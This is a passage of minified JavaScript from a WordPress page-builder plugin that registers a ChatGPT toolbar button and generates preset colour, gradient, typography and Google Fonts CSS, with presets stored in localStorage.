Prompt","ultimate-post")))))))))}},5207:(e,t,l)=>{"use strict";var o=l(67294),a=l(87763),i=l(25364);const{BlockControls:n}=wp.blockEditor,{ToolbarButton:r}=wp.components,{render:s}=wp.element,{registerFormatType:p}=wp.richText;"true"==ultp_data.settings.ultp_chatgpt&&p("ultimate-post/chatgpt",{title:"ChatGPT",tagName:"span",className:"ultp-chatgpt",edit:e=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n,null,(0,o.createElement)(r,{icon:a.Z.chatgpt,label:"ChatGPT",className:"components-toolbar",onClick:()=>{const t=document.createElement("div");t.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(t),s((0,o.createElement)(i.Z,{isShow:!0,value:e.value,onChange:t=>e.onChange(t),fromEditPostToolbar:!1}),t),document.body.classList.add("ultp-popup-open")}})))})},60448:(e,t,l)=>{"use strict";l.d(t,{AJ:()=>i,Jj:()=>c,MR:()=>u,RK:()=>r,_n:()=>p,cC:()=>y,hN:()=>s,je:()=>g,nl:()=>d,sR:()=>n,x2:()=>a,xP:()=>m});var o=l(32030);const{__}=wp.i18n,a=(e,t,l,o)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:l}}).then((a=>{a.success&&("set"==e&&c(t,l),o&&o(a))}))},i=(e,t="",l=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((o,a)=>{if(!["rootCSS","globalColorCSS"].includes(o)){const a=o,i=t[o]?.hasOwnProperty("openColor")?"color"==t[o].type?t[o].color:t[o].gradient:t[o]||l||"";e+=`--postx_preset_${a}: ${i}; `}})),e+=" }",e}if("typoCSS"==e){const e=i("multipleTypos");let a="",n=":root { ";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return Object.keys(t).forEach(((i,s)=>{const p=t[i],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(i);if(!["rootCSS","presetTypoCSS"].includes(i)&&"object"==typeof p&&Object.keys(p).length){const e=!r.includes(p.family),t=l?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!a.includes(p.family.replace(" ","+")+":")&&void 0!==o.Z&&(a+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(o.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(n+=p.family?`--postx_preset_${i}_font_family: ${p.family}; `:"",n+=p.family?`--postx_preset_${i}_font_family_type: ${p.type||"sans-serif"}; `:"",n+=p.weight?`--postx_preset_${i}_font_weight: ${p.weight}; `:"",n+=p.style?`--postx_preset_${i}_font_style: ${p.style}; `:"",n+=p.decoration?`--postx_preset_${i}_text_decoration: ${p.decoration}; `:"",n+=p.transform?`--postx_preset_${i}_text_transform: ${p.transform}; `:"",n+=p.spacing?.lg?`--postx_preset_${i}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",n+=p.spacing?.sm?`--postx_preset_${i}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",n+=p.spacing?.xs?`--postx_preset_${i}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),n+=p.size?.lg?`--postx_preset_${i}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",n+=p.size?.sm?`--postx_preset_${i}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",n+=p.size?.xs?`--postx_preset_${i}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",n+=p.height?.lg?`--postx_preset_${i}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",n+=p.height?.sm?`--postx_preset_${i}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",n+=p.height?.xs?`--postx_preset_${i}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),n+="}",a+n}if("font_load"==e){let e="";const o=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],a=l?ultp_dashboard_pannel:ultp_data,i=!((!a.settings?.hasOwnProperty("disable_google_font")||"yes"==a.settings.disable_google_font)&&a.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const l=!o.includes(t.family);i&&l&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let o="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],i=l?ultp_dashboard_pannel:ultp_data,n=!((!i.settings?.hasOwnProperty("disable_google_font")||"yes"==i.settings.disable_google_font)&&i.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,l)=>{const i=!a.includes(e);n&&i&&e&&(o+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[l]+"'); ")})),o}if("bgCSS"==e){let e={};const l="object"==typeof t?{...t}:{};if("color"==l.type)e.backgroundColor=l.color;else if("gradient"==l.type&&l.gradient){let t=l.gradient;"object"==typeof l.gradient&&(t="linear"==l.gradient.type?"linear-gradient("+l.gradient.direction+"deg, "+l.gradient.color1+" "+l.gradient.start+"%,"+l.gradient.color2+" "+l.gradient.stop+"%);":"radial-gradient( circle at "+l.gradient.radial+" , "+l.gradient.color1+" "+l.gradient.start+"%,"+l.gradient.color2+" "+l.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==l.type){var a;(l.fallbackColor||l.color)&&(e.backgroundColor=null!==(a=l.fallbackColor)&&void 0!==a?a:l.color),l.image&&(e.backgroundImage='url("'+l.image+'")',l.position&&(e.backgroundPositionX=100*l.position.x+"%",e.backgroundPositionY=100*l.position.y+"%"),l.attachment&&(e.backgroundAttachments=l.attachment),l.repeat&&(e.backgroundRepeat=l.repeat),l.size&&(e.backgroundSize=l.size))}else"video"==l.type&&l.fallback&&(e.backgroundImage='url("'+l.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var l;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(l=e.fallbackColor)&&void 0!==l?l:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n                font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},n=e=>{const t=i("multipleTypos"),l=[...t.Body_and_Others_typo,...t.Heading_typo].includes(e)?[...t.Body_and_Others_typo].includes(e)?"Body_and_Others_typo":"Heading_typo":e;return e?{openTypography:1,presetTypo:e,family:`var(--postx_preset_${l}_font_family)`,type:`var(--postx_preset_${l}_font_family_type)`,weight:`var(--postx_preset_${l}_font_weight)`,spacing:{lg:`var(--postx_preset_${l}_letter_spacing_lg, normal)`,sm:`var(--postx_preset_${l}_letter_spacing_sm, normal)`,xs:`var(--postx_preset_${l}_letter_spacing_xs, normal)`},decoration:`var(--postx_preset_${l}_text_decoration)`,style:`var(--postx_preset_${l}_font_style)`,transform:`var(--postx_preset_${l}_text_transform)`,size:{lg:`var(--postx_preset_${e}_font_size_lg, initial)`,sm:`var(--postx_preset_${e}_font_size_sm, initial)`,xs:`var(--postx_preset_${e}_font_size_xs, initial)`},height:{lg:`var(--postx_preset_${e}_line_height_lg, normal)`,sm:`var(--postx_preset_${e}_line_height_sm, normal)`,xs:`var(--postx_preset_${e}_line_height_xs, normal)`}}:{openTypography:1}},r=e=>{let t=JSON.parse(localStorage.getItem("ultpPresetTypos"));if(t)return"object"==typeof t?"options"==e?Object.keys(t).filter((e=>"presetTypoCSS"!==e)).map((e=>({value:e,label:e.replace("_typo","").replaceAll("_"," ")}))):Object.keys(t).filter((e=>"presetTypoCSS"!==e)):[];a("get","ultpPresetTypos","",(function(l){if(l.data)return t=l.data,c("ultpPresetTypos",t),"object"==typeof t?"options"==e?Object.keys(t).filter((e=>"presetTypoCSS"!==e)).map((e=>({value:e,label:e.replace("_typo","").replaceAll("_"," ")}))):Object.keys(t).filter((e=>"presetTypoCSS"!==e)):[]}))},s=(e,t)=>{let l=JSON.parse(localStorage.getItem("ultpPresetColors"));if(l)return"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[];a("get","ultpPresetColors","",(function(o){if(o.data)return l=o.data,c("ultpPresetColors",l),"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[]}))},p=(e,t)=>{let l=JSON.parse(localStorage.getItem("ultpPresetGradients"));if(l)return"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[];a("get","presetGradients","",(function(o){if(o.data)return l=o.data,c("ultpPresetGradients",l),"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[]}))},c=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},u=e=>"string"==typeof e&&e.includes("--postx_preset")?"":e,d=(e,t)=>("color"==t&&e?e=e.replace("var(--postx_preset_","").replace("_color)","").replaceAll("_"," "):"typo"==t&&e?e=e.replace("_typo","").replaceAll("_"," "):"gradient"==t&&e&&(e=e.replace("var(--postx_preset_","").replace("_gradient)","").replaceAll("_"," ")),e),m=e=>{const t=n(e);return{fontFamily:t.family,fontSize:t.size.lg,fontWeight:t.weight}},g=e=>{const t="typo"==e?350:0,l=wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post";wp.data&&wp.data.dispatch(l)&&(function(){const e=wp.data.select("core/block-editor").getSelectedBlock();localStorage.setItem("ultp_prev_sel_block",e?.clientId),localStorage.setItem("ultp_settings_save_state","true")}(),wp.data.dispatch(l).openGeneralSidebar("ultp-postx-settings/postx-settings"),document.getElementsByClassName("interface-interface-skeleton__sidebar")[0]?.scrollTo({top:t,behavior:"smooth"}))},y=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},53049:(e,t,l)=>{"use 